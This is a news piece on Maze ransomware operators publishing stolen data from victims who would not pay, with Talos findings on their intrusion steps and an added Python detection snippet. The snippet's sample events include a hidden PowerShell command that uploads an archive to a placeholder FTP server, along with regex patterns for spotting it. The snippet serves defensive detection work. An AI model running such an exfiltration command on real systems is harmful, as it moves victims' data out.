Maze Ransomware Operators Publish User Information
As if having their data compromised were not bad enough, businesses that fell victim to Maze ransomware now face a further threat: their data could be made public.
Maze's operators have been collecting data from victim organisations for some time, using it as leverage until payment is received to decrypt the files. Now they are threatening to release that data for every victim who refuses to pay the ransom.
To this end, the threat actor created a website listing the names and websites of eight businesses that allegedly refused to pay the sum demanded to recover their files.
According to technology journalist Brian Krebs, even though the event did not make news, at least one of the businesses on that list was actually targeted by Maze ransomware.
On that page the Maze operators publish details such as the initial date of infection, a selection of the stolen files (Office, text and PDF documents), the total volume of data allegedly taken from the company, and the IP addresses and computer names of the infected servers.
The move is not surprising, particularly since the people behind Maze have been exfiltrating victim data for some time and have already threatened to disclose it publicly if the victim does not pay the demanded ransom.
In one incident in which Maze ransomware was deployed, the attackers first used Cobalt Strike after gaining access to the network, collecting information about the target environment before moving laterally. They also used a technique commonly associated with the Russian threat actor Cozy Bear.
The hackers then began using PowerShell to exfiltrate data and connect to a remote FTP server. They only implemented Maze ransomware after this phase was done to encrypt the data of the victim.
In another incident that Cisco Talos attributed to the same actor, Cobalt Strike was again used after the initial breach, and PowerShell was used to exfiltrate large amounts of data over FTP. The attackers then demanded payment, without having yet released the information.
The two incidents are linked primarily through the command-and-control (C&C) infrastructure used (the data was uploaded to the same server as in the earlier incident), the use of 7-Zip to compress the collected data, interactive logins over the Windows Remote Desktop Protocol, and remote execution of PowerShell.
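The chain Talos describes (7-Zip staging of collected data, then PowerShell pushing it to an FTP server) is something a defender can correlate in process-creation telemetry. The following is an added example, not code from the article or from Talos: it runs over constructed sample events (hostnames, timestamps, command lines and the FTP address are all made up) and flags hosts where an archive is built and PowerShell references an FTP URL shortly afterwards.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events: (host, UTC timestamp, command line).
# Only FILESRV-02 shows the full staging-then-FTP sequence described in the article.
SAMPLE_EVENTS = [
    ("FILESRV-02", "2019-12-10T09:05:12", r"7z.exe a -p C:\Temp\hr.7z \\FILESRV-02\HR"),
    ("FILESRV-02", "2019-12-10T09:20:45",
     'powershell.exe -nop -w hidden -c "$c=New-Object Net.WebClient;'
     "$c.UploadFile('ftp://203.0.113.9/hr.7z','C:\\Temp\\hr.7z')\""),
    # Archive creation with no FTP follow-up: ordinary admin activity, not flagged.
    ("BUILD-03", "2019-12-10T11:00:00", r"7z.exe a build.7z C:\Builds\out"),
    ("BUILD-03", "2019-12-10T11:02:00", r"powershell.exe -c Get-ChildItem C:\Builds"),
    # PowerShell touching FTP with no prior archive on that host: not flagged by this rule.
    ("WS-07", "2019-12-10T13:30:00", "powershell.exe -c Invoke-WebRequest ftp://203.0.113.9/x.7z"),
]

# 7-Zip invoked with the 'a' (add to archive) command, with or without a path prefix.
ARCHIVE_RE = re.compile(r"(?:^|\\)7z(?:a)?\.exe\s+a\b", re.IGNORECASE)
# PowerShell command line that references an FTP URL anywhere in its arguments.
FTP_PS_RE = re.compile(r"powershell(?:\.exe)?.*\bftp://", re.IGNORECASE | re.DOTALL)


def find_staging_then_ftp(events, window=timedelta(hours=2)):
    """Return (host, archive_time, exfil_time) for every host where an archive was
    created and, within `window`, a PowerShell process referenced an FTP URL.
    Events are processed in timestamp order so only archive-before-FTP sequences match."""
    last_archive = {}  # host -> time of the most recent archive creation
    hits = []
    for host, ts, cmdline in sorted(events, key=lambda e: e[1]):
        t = datetime.fromisoformat(ts)
        if ARCHIVE_RE.search(cmdline):
            last_archive[host] = t
        elif FTP_PS_RE.search(cmdline):
            archived_at = last_archive.get(host)
            if archived_at is not None and t - archived_at <= window:
                hits.append((host, archived_at.isoformat(), ts))
    return hits


if __name__ == "__main__":
    for host, staged, exfil in find_staging_then_ftp(SAMPLE_EVENTS):
        print(f"{host}: archive staged at {staged}, PowerShell FTP activity at {exfil}")
```

The same two-stage correlation can be extended with the other indicators named above, such as an interactive RDP logon on the host shortly before the archive is created.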
“The use of targeted ransomware attacks isn’t new and, unfortunately, it’s not going anywhere anytime soon. This is an extremely lucrative attack avenue for adversaries and as such, its popularity is likely only going to increase. What makes these particular attacks interesting is the additional monetization avenue of exfiltrating data in the process,” Talos points out.
With this data in hand, the threat actor can demand more money from the victim, or can monetise it by selling it to other cyber criminals on dark web platforms. Organisations will also bear the cost of the damage caused by having their data published.
“This trend of achieving maximum monetary gain for their nefarious activities is increasingly common in the crimeware space […]. Expect adversaries to be increasingly aware of the systems and networks they are compromising as all systems and networks are not created equally and some have much higher profit margins, when compromised,” Talos concludes.